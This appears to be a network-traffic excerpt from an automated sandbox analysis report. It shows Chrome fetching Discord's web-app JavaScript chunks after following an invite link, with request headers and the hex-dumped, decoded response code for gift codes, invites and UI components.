                                                                          2023-12-10 16:45:23 UTC1369INData Raw: 2c 67 61 74 65 77 61 79 5f 63 68 65 63 6b 6f 75 74 5f 63 6f 6e 74 65 78 74 3a 61 77 61 69 74 20 28 30 2c 61 2e 63 72 65 61 74 65 47 61 74 65 77 61 79 43 68 65 63 6b 6f 75 74 43 6f 6e 74 65 78 74 29 28 64 29 7d 2c 6f 6c 64 46 6f 72 6d 45 72 72 6f 72 73 3a 21 30 7d 29 3b 72 65 74 75 72 6e 20 73 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 47 49 46 54 5f 43 4f 44 45 5f 52 45 44 45 45 4d 5f 53 55 43 43 45 53 53 22 2c 63 6f 64 65 3a 65 2c 65 6e 74 69 74 6c 65 6d 65 6e 74 3a 74 2e 62 6f 64 79 7d 29 2c 7b 63 6f 64 65 3a 65 2c 65 6e 74 69 74 6c 65 6d 65 6e 74 3a 74 7d 7d 63 61 74 63 68 28 6c 29 7b 6c 65 74 20 74 3d 6e 65 77 20 6e 2e 42 69 6c 6c 69 6e 67 45 72 72 6f 72 28 6c 29 3b 74 68 72 6f 77 20 73 2e 64 65 66 61 75 6c 74 2e 64 69
                                                                          Data Ascii: ,gateway_checkout_context:await (0,a.createGatewayCheckoutContext)(d)},oldFormErrors:!0});return s.default.dispatch({type:"GIFT_CODE_REDEEM_SUCCESS",code:e,entitlement:t.body}),{code:e,entitlement:t}}catch(l){let t=new n.BillingError(l);throw s.default.di
                                                                          2023-12-10 16:45:23 UTC1369INData Raw: 65 3a 70 2e 61 6c 69 67 6e 53 74 61 72 74 2c 63 68 69 6c 64 72 65 6e 3a 68 2e 64 65 66 61 75 6c 74 2e 4d 65 73 73 61 67 65 73 2e 53 54 41 47 45 5f 49 4e 56 49 54 45 5f 47 55 49 4c 44 5f 48 45 41 44 45 52 7d 29 2c 28 30 2c 69 2e 6a 73 78 73 29 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 70 2e 67 75 69 6c 64 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 69 2e 6a 73 78 29 28 43 2e 64 65 66 61 75 6c 74 2c 7b 6d 61 73 6b 3a 43 2e 64 65 66 61 75 6c 74 2e 4d 61 73 6b 73 2e 53 51 55 49 52 43 4c 45 2c 77 69 64 74 68 3a 34 30 2c 68 65 69 67 68 74 3a 34 30 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 69 2e 6a 73 78 29 28 6f 2e 64 65 66 61 75 6c 74 2c 7b 67 75 69 6c 64 3a 73 2c 73 69 7a 65 3a 6f 2e 64 65 66 61 75 6c 74 2e 53 69 7a 65 73 2e 4d 45 44 49 55 4d 2c 61 63
                                                                          Data Ascii: e:p.alignStart,children:h.default.Messages.STAGE_INVITE_GUILD_HEADER}),(0,i.jsxs)("div",{className:p.guild,children:[(0,i.jsx)(C.default,{mask:C.default.Masks.SQUIRCLE,width:40,height:40,children:(0,i.jsx)(o.default,{guild:s,size:o.default.Sizes.MEDIUM,ac
                                                                          2023-12-10 16:45:23 UTC1369INData Raw: 53 54 41 47 45 5f 43 48 41 4e 4e 45 4c 5f 4c 49 56 45 5f 4e 4f 57 7d 29 5d 7d 29 2c 28 30 2c 69 2e 6a 73 78 73 29 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 70 2e 62 61 63 6b 67 72 6f 75 6e 64 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 69 2e 6a 73 78 29 28 63 2e 64 65 66 61 75 6c 74 2c 7b 68 65 69 67 68 74 3a 31 36 2c 77 69 64 74 68 3a 31 36 2c 63 6c 61 73 73 4e 61 6d 65 3a 70 2e 6c 69 73 74 65 6e 65 72 73 7d 29 2c 28 30 2c 69 2e 6a 73 78 29 28 72 2e 48 65 61 64 69 6e 67 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 61 28 70 2e 6c 61 62 65 6c 2c 70 2e 6c 69 73 74 65 6e 65 72 73 29 2c 76 61 72 69 61 6e 74 3a 22 68 65 61 64 69 6e 67 2d 73 6d 2f 73 65 6d 69 62 6f 6c 64 22 2c 63 68 69 6c 64 72 65 6e 3a 41 7d 29 5d 7d 29 5d 7d 29 2c 49 26 26 28 30 2c 69 2e 6a
                                                                          Data Ascii: STAGE_CHANNEL_LIVE_NOW})]}),(0,i.jsxs)("div",{className:p.background,children:[(0,i.jsx)(c.default,{height:16,width:16,className:p.listeners}),(0,i.jsx)(r.Heading,{className:a(p.label,p.listeners),variant:"heading-sm/semibold",children:A})]})]}),I&&(0,i.j
                                                                          2023-12-10 16:45:23 UTC1369INData Raw: 66 61 75 6c 74 2e 4d 65 73 73 61 67 65 73 2e 53 54 41 47 45 5f 43 48 41 4e 4e 45 4c 5f 4a 4f 49 4e 5f 42 55 54 54 4f 4e 7d 29 5d 7d 29 5d 7d 29 7d 7d 2c 36 35 33 32 34 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6c 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6c 2e 72 28 74 29 2c 6c 2e 64 28 74 2c 7b 64 65 66 61 75 6c 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 7d 29 2c 6c 28 22 32 32 32 30 30 37 22 29 2c 6c 28 22 37 30 31 30 32 22 29 3b 76 61 72 20 69 3d 6c 28 22 33 37 39 38 33 22 29 2c 73 3d 6c 28 22 38 38 34 36 39 31 22 29 2c 6e 3d 6c 28 22 34 34 36 36 37 34 22 29 2c 61 3d 6c 28 22 32 30 36 32 33 30 22 29 2c 72 3d 6c 28 22 34 39 31 36 30 35 22 29 2c 75 3d 6c 28 22 32 31 30 37 32 31 22 29 2c 64 3d 6c 28 22 37 38 33 34 35 22 29 3b 66
                                                                          Data Ascii: fault.Messages.STAGE_CHANNEL_JOIN_BUTTON})]})]})}},65324:function(e,t,l){"use strict";l.r(t),l.d(t,{default:function(){return o}}),l("222007"),l("70102");var i=l("37983"),s=l("884691"),n=l("446674"),a=l("206230"),r=l("491605"),u=l("210721"),d=l("78345");f
                                                                          2023-12-10 16:45:23 UTC1369INData Raw: 52 45 44 45 45 4d 41 42 4c 45 3a 34 7d 29 3b 69 3d 63 6c 61 73 73 20 65 20 65 78 74 65 6e 64 73 20 61 2e 64 65 66 61 75 6c 74 7b 73 74 61 74 69 63 20 63 72 65 61 74 65 46 72 6f 6d 53 65 72 76 65 72 28 74 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 65 28 7b 75 73 65 72 49 64 3a 6e 75 6c 6c 21 3d 74 2e 75 73 65 72 3f 74 2e 75 73 65 72 2e 69 64 3a 6e 75 6c 6c 2c 63 6f 64 65 3a 74 2e 63 6f 64 65 2c 73 6b 75 49 64 3a 74 2e 73 6b 75 5f 69 64 2c 61 70 70 6c 69 63 61 74 69 6f 6e 49 64 3a 74 2e 61 70 70 6c 69 63 61 74 69 6f 6e 5f 69 64 2c 75 73 65 73 3a 74 2e 75 73 65 73 2c 6d 61 78 55 73 65 73 3a 74 2e 6d 61 78 5f 75 73 65 73 2c 73 74 6f 72 65 4c 69 73 74 69 6e 67 49 64 3a 6e 75 6c 6c 21 3d 74 2e 73 74 6f 72 65 5f 6c 69 73 74 69 6e 67 3f 74 2e 73 74 6f 72 65 5f 6c 69
                                                                          Data Ascii: REDEEMABLE:4});i=class e extends a.default{static createFromServer(t){return new e({userId:null!=t.user?t.user.id:null,code:t.code,skuId:t.sku_id,applicationId:t.application_id,uses:t.uses,maxUses:t.max_uses,storeListingId:null!=t.store_listing?t.store_li
                                                                          2023-12-10 16:45:23 UTC1369INData Raw: 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 74 68 69 73 2e 73 75 62 73 63 72 69 70 74 69 6f 6e 50 6c 61 6e 49 64 7d 67 65 74 20 70 72 65 6d 69 75 6d 53 75 62 73 63 72 69 70 74 69 6f 6e 54 79 70 65 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 73 53 75 62 73 63 72 69 70 74 69 6f 6e 26 26 64 2e 50 72 65 6d 69 75 6d 53 75 62 73 63 72 69 70 74 69 6f 6e 53 4b 55 54 6f 50 72 65 6d 69 75 6d 54 79 70 65 5b 74 68 69 73 2e 73 6b 75 49 64 5d 7c 7c 6e 75 6c 6c 7d 67 65 74 20 69 73 53 65 6c 66 52 65 64 65 65 6d 61 62 6c 65 28 29 7b 72 65 74 75 72 6e 21 28 30 2c 72 2e 68 61 73 46 6c 61 67 29 28 74 68 69 73 2e 66 6c 61 67 73 2c 6f 2e 4e 4f 54 5f 53 45 4c 46 5f 52 45 44 45 45 4d 41 42 4c 45 29 7d 67 65 74 20 69 73 45 78 69 73 74 69 6e 67 50 72 65 6d 69 75 6d 53 75 62 73 63
                                                                          Data Ascii: return null!=this.subscriptionPlanId}get premiumSubscriptionType(){return this.isSubscription&&d.PremiumSubscriptionSKUToPremiumType[this.skuId]||null}get isSelfRedeemable(){return!(0,r.hasFlag)(this.flags,o.NOT_SELF_REDEEMABLE)}get isExistingPremiumSubsc


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          355192.168.2.550091162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:23 UTC981OUTGET /assets/23992.3dc89a4c11d1402ff9e7.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722; _cfuvid=zIygtpvXesZXGwfXtJTAhcedx5nLjPwWRmcIZhgNXcw-1702226723078-0-604800000
                                                                          2023-12-10 16:45:23 UTC1126INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 32 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 33 32 36 39 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 33 65 64 61 32 31 37 34 33 63 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:23 GMTContent-Type: application/javascriptContent-Length: 13269Connection: closeCF-Ray: 8336f53eda21743c-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.co
                                                                          2023-12-10 16:45:23 UTC243INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 32 33 39 39 32 22 5d 2c 7b 38 30 33 34 35 32 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 73 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 73 2e 70 2b 22 62 37 37 64 37 62 34 38 38 36 30 62 62 65 66 64 65 65 62 32 2e 73 76 67 22 7d 2c 33 37 38 39 31 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 73 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 73 2e 70 2b 22 39 30 36 61 33 38 63 62 64 34 35 64 36 37 38 30 33 30 34 63 2e 73 76 67 22 7d 2c 33 35 36 30 30 32
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["23992"],{803452:function(e,t,s){"use strict";e.exports=s.p+"b77d7b48860bbefdeeb2.svg"},378913:function(e,t,s){"use strict";e.exports=s.p+"906a38cbd45d6780304c.svg"},356002
                                                                          2023-12-10 16:45:23 UTC1369INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 73 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 73 2e 70 2b 22 36 38 32 66 31 62 36 37 39 62 35 62 64 62 31 31 37 31 36 35 2e 77 65 62 6d 22 7d 2c 31 39 37 34 39 32 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 73 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 73 2e 70 2b 22 38 37 35 39 30 61 38 31 63 66 37 38 36 36 35 65 32 33 65 61 2e 77 65 62 6d 22 7d 2c 32 34 32 37 37 37 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 73 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 73 2e 70 2b 22 32 37 33 31 36 66 32 35 36 65 30 61 31 66 62 32 34 34 32 31 2e 6d 6f 76 22 7d 2c 38 33 38 36 32 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 73 29 7b 22 75
                                                                          Data Ascii: :function(e,t,s){"use strict";e.exports=s.p+"682f1b679b5bdb117165.webm"},197492:function(e,t,s){"use strict";e.exports=s.p+"87590a81cf78665e23ea.webm"},242777:function(e,t,s){"use strict";e.exports=s.p+"27316f256e0a1fb24421.mov"},838623:function(e,t,s){"u
                                                                          2023-12-10 16:45:23 UTC1369INData Raw: 75 6c 74 44 79 6e 61 6d 69 63 4c 69 6e 6b 54 65 6d 70 6c 61 74 65 29 28 29 2c 7b 75 74 6d 53 6f 75 72 63 65 3a 65 2c 66 69 6e 67 65 72 70 72 69 6e 74 3a 74 2c 61 74 74 65 6d 70 74 49 64 3a 6e 7d 29 7d 72 65 74 75 72 6e 22 64 69 73 63 6f 72 64 3a 2f 2f 22 7d 61 73 79 6e 63 20 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 6c 65 74 20 74 3d 61 77 61 69 74 20 5f 28 65 29 2c 73 3d 28 30 2c 72 2e 70 61 72 73 65 44 79 6e 61 6d 69 63 4c 69 6e 6b 29 28 74 29 3b 6e 75 6c 6c 21 3d 73 26 26 70 2e 64 65 66 61 75 6c 74 2e 74 72 61 63 6b 28 6d 2e 41 6e 61 6c 79 74 69 63 45 76 65 6e 74 73 2e 44 45 45 50 5f 4c 49 4e 4b 5f 43 4c 49 43 4b 45 44 2c 7b 66 69 6e 67 65 72 70 72 69 6e 74 3a 28 30 2c 69 2e 6d 61 79 62 65 45 78 74 72 61 63 74 49 64 29 28 73 2e 66 69 6e 67 65 72 70 72
                                                                          Data Ascii: ultDynamicLinkTemplate)(),{utmSource:e,fingerprint:t,attemptId:n})}return"discord://"}async function b(e){let t=await _(e),s=(0,r.parseDynamicLink)(t);null!=s&&p.default.track(m.AnalyticEvents.DEEP_LINK_CLICKED,{fingerprint:(0,i.maybeExtractId)(s.fingerpr
                                                                          2023-12-10 16:45:23 UTC1369INData Raw: 6e 45 78 70 65 72 69 6d 65 6e 74 2c 69 73 45 6c 69 67 69 62 6c 65 3a 6e 2e 69 73 48 61 6c 6c 6f 77 65 65 6e 32 30 32 33 45 6e 61 62 6c 65 64 2c 75 73 65 49 73 45 6c 69 67 69 62 6c 65 3a 6e 2e 75 73 65 48 61 6c 6c 6f 77 65 65 6e 32 30 32 33 45 6e 61 62 6c 65 64 2c 67 65 74 41 70 70 53 70 69 6e 6e 65 72 53 6f 75 72 63 65 73 3a 28 29 3d 3e 7b 6c 65 74 20 65 3d 44 61 74 65 2e 6e 6f 77 28 29 3b 69 66 28 21 28 65 3c 31 36 39 37 36 34 38 34 65 35 29 26 26 21 28 65 3e 31 36 39 39 30 33 30 38 65 35 29 29 72 65 74 75 72 6e 7b 77 65 62 6d 44 61 72 6b 3a 6c 2c 77 65 62 6d 4c 69 67 68 74 3a 72 7d 7d 2c 67 65 74 4c 6f 61 64 69 6e 67 54 69 70 73 3a 28 29 3d 3e 7b 6c 65 74 20 65 3d 44 61 74 65 2e 6e 6f 77 28 29 3b 69 66 28 21 28 65 3c 31 36 39 37 36 34 38 34 65 35 29 26
                                                                          Data Ascii: nExperiment,isEligible:n.isHalloween2023Enabled,useIsEligible:n.useHalloween2023Enabled,getAppSpinnerSources:()=>{let e=Date.now();if(!(e<16976484e5)&&!(e>16990308e5))return{webmDark:l,webmLight:r}},getLoadingTips:()=>{let e=Date.now();if(!(e<16976484e5)&
                                                                          2023-12-10 16:45:23 UTC1369INData Raw: 6a 73 5f 63 6f 6d 70 72 65 73 73 65 64 5f 62 79 74 65 5f 73 69 7a 65 3a 30 2c 6a 73 5f 75 6e 63 6f 6d 70 72 65 73 73 65 64 5f 62 79 74 65 5f 73 69 7a 65 3a 30 2c 6a 73 5f 74 72 61 6e 73 66 65 72 5f 62 79 74 65 5f 73 69 7a 65 3a 30 2c 63 73 73 5f 63 6f 6d 70 72 65 73 73 65 64 5f 62 79 74 65 5f 73 69 7a 65 3a 30 2c 63 73 73 5f 75 6e 63 6f 6d 70 72 65 73 73 65 64 5f 62 79 74 65 5f 73 69 7a 65 3a 30 2c 63 73 73 5f 74 72 61 6e 73 66 65 72 5f 62 79 74 65 5f 73 69 7a 65 3a 30 7d 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 26 26 6e 75 6c 6c 21 3d 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2e 67 65 74 45 6e 74 72 69 65 73 26 26 77 69 6e 64 6f 77 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2e 67 65 74 45 6e 74
                                                                          Data Ascii: js_compressed_byte_size:0,js_uncompressed_byte_size:0,js_transfer_byte_size:0,css_compressed_byte_size:0,css_uncompressed_byte_size:0,css_transfer_byte_size:0};return null!=window.performance&&null!=window.performance.getEntries&&window.performance.getEnt
                                                                          2023-12-10 16:45:23 UTC1369INData Raw: 73 28 22 39 31 33 31 34 34 22 29 2c 72 3d 73 28 22 34 39 31 31 31 22 29 3b 6c 65 74 20 69 3d 7b 6c 61 73 74 56 69 65 77 65 64 50 61 74 68 3a 6e 75 6c 6c 2c 6c 61 73 74 56 69 65 77 65 64 4e 6f 6e 56 6f 69 63 65 50 61 74 68 3a 6e 75 6c 6c 7d 2c 75 3d 69 2c 6f 3d 22 4c 41 53 54 5f 56 49 45 57 45 44 5f 50 41 54 48 22 3b 63 6c 61 73 73 20 63 20 65 78 74 65 6e 64 73 20 6e 2e 64 65 66 61 75 6c 74 2e 50 65 72 73 69 73 74 65 64 53 74 6f 72 65 7b 69 6e 69 74 69 61 6c 69 7a 65 28 29 7b 6c 65 74 20 65 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 69 3b 75 3d 6e 75 6c 6c 21 3d 65 3f 65 3a 69 7d 67 65 74 20 64 65 66 61 75 6c 74 52 6f 75 74 65 28 29
                                                                          Data Ascii: s("913144"),r=s("49111");let i={lastViewedPath:null,lastViewedNonVoicePath:null},u=i,o="LAST_VIEWED_PATH";class c extends n.default.PersistedStore{initialize(){let e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:i;u=null!=e?e:i}get defaultRoute()
                                                                          2023-12-10 16:45:23 UTC1369INData Raw: 37 37 30 37 38 22 29 2c 69 3d 73 28 22 38 34 33 39 36 32 22 29 2c 75 3d 73 28 22 31 34 35 31 33 31 22 29 2c 6f 3d 73 28 22 34 37 36 32 36 33 22 29 2c 63 3d 73 28 22 34 37 36 37 36 35 22 29 2c 64 3d 73 28 22 36 33 37 38 38 38 22 29 2c 70 3d 73 28 22 39 38 30 31 33 22 29 2c 66 3d 73 28 22 37 30 31 39 30 39 22 29 2c 6d 3d 73 28 22 34 33 39 39 33 32 22 29 2c 5f 3d 73 28 22 34 39 31 31 31 22 29 2c 62 3d 73 28 22 37 38 32 33 34 30 22 29 2c 67 3d 73 28 22 37 39 39 30 32 22 29 3b 6c 65 74 20 45 3d 72 2e 41 76 61 74 61 72 3b 6e 75 6c 6c 3d 3d 45 26 26 28 45 3d 28 29 3d 3e 6e 75 6c 6c 29 3b 6c 65 74 20 68 3d 65 3d 3e 7b 6c 65 74 7b 63 6c 61 73 73 4e 61 6d 65 3a 74 2c 69 64 3a 73 2c 63 68 69 6c 64 72 65 6e 3a 61 7d 3d 65 3b 72 65 74 75 72 6e 28 30 2c 6e 2e 6a 73 78
                                                                          Data Ascii: 77078"),i=s("843962"),u=s("145131"),o=s("476263"),c=s("476765"),d=s("637888"),p=s("98013"),f=s("701909"),m=s("439932"),_=s("49111"),b=s("782340"),g=s("79902");let E=r.Avatar;null==E&&(E=()=>null);let h=e=>{let{className:t,id:s,children:a}=e;return(0,n.jsx
                                                                          2023-12-10 16:45:23 UTC1369INData Raw: 61 6c 75 65 3a 69 2c 63 6c 61 73 73 4e 61 6d 65 3a 75 2c 69 6e 70 75 74 43 6c 61 73 73 4e 61 6d 65 3a 6f 2c 73 65 74 52 65 66 3a 64 2c 74 79 70 65 3a 70 3d 22 74 65 78 74 22 2c 6f 6e 43 68 61 6e 67 65 3a 66 2c 61 75 74 6f 43 6f 6d 70 6c 65 74 65 3a 6d 2c 61 75 74 6f 46 6f 63 75 73 3a 5f 2c 6d 61 78 4c 65 6e 67 74 68 3a 62 2c 73 70 65 6c 6c 43 68 65 63 6b 3a 45 2c 6e 61 6d 65 3a 68 2c 64 65 73 63 72 69 70 74 69 6f 6e 3a 78 2c 72 65 71 75 69 72 65 64 3a 54 2c 6f 6e 46 6f 63 75 73 3a 4e 2c 6f 6e 42 6c 75 72 3a 76 7d 3d 65 2c 49 3d 28 30 2c 63 2e 75 73 65 55 49 44 29 28 29 3b 72 65 74 75 72 6e 28 30 2c 6e 2e 6a 73 78 73 29 28 72 2e 46 6f 72 6d 49 74 65 6d 2c 7b 74 69 74 6c 65 3a 74 2c 65 72 72 6f 72 3a 73 2c 63 6c 61 73 73 4e 61 6d 65 3a 75 2c 72 65 71 75 69
                                                                          Data Ascii: alue:i,className:u,inputClassName:o,setRef:d,type:p="text",onChange:f,autoComplete:m,autoFocus:_,maxLength:b,spellCheck:E,name:h,description:x,required:T,onFocus:N,onBlur:v}=e,I=(0,c.useUID)();return(0,n.jsxs)(r.FormItem,{title:t,error:s,className:u,requi
                                                                          2023-12-10 16:45:23 UTC1369INData Raw: 72 6d 61 6c 22 2c 63 68 69 6c 64 72 65 6e 3a 62 2e 64 65 66 61 75 6c 74 2e 4d 65 73 73 61 67 65 73 2e 49 4e 53 54 41 4e 54 5f 49 4e 56 49 54 45 5f 47 55 49 4c 44 5f 4d 45 4d 42 45 52 53 5f 4f 4e 4c 49 4e 45 2e 66 6f 72 6d 61 74 28 7b 6d 65 6d 62 65 72 73 4f 6e 6c 69 6e 65 3a 73 7d 29 7d 29 5d 7d 29 29 2c 28 30 2c 6e 2e 6a 73 78 73 29 28 75 2e 64 65 66 61 75 6c 74 2c 7b 6a 75 73 74 69 66 79 3a 75 2e 64 65 66 61 75 6c 74 2e 4a 75 73 74 69 66 79 2e 43 45 4e 54 45 52 2c 63 6c 61 73 73 4e 61 6d 65 3a 69 2c 63 68 69 6c 64 72 65 6e 3a 5b 74 2c 28 30 2c 6e 2e 6a 73 78 73 29 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 6c 28 67 2e 70 69 6c 6c 2c 6f 26 26 67 2e 70 69 6c 6c 46 6c 61 74 29 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 6e 2e 6a 73 78 29 28 22 69
                                                                          Data Ascii: rmal",children:b.default.Messages.INSTANT_INVITE_GUILD_MEMBERS_ONLINE.format({membersOnline:s})})]})),(0,n.jsxs)(u.default,{justify:u.default.Justify.CENTER,className:i,children:[t,(0,n.jsxs)("div",{className:l(g.pill,o&&g.pillFlat),children:[(0,n.jsx)("i


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          356192.168.2.550092162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:23 UTC981OUTGET /assets/68560.e27fd85667a295676749.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.2.1702226722; _cfuvid=zIygtpvXesZXGwfXtJTAhcedx5nLjPwWRmcIZhgNXcw-1702226723078-0-604800000
                                                                          2023-12-10 16:45:23 UTC1122INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 32 33 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 34 39 33 37 39 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 34 30 33 66 64 31 32 32 32 31 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:23 GMTContent-Type: application/javascriptContent-Length: 49379Connection: closeCF-Ray: 8336f5403fd12221-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.co
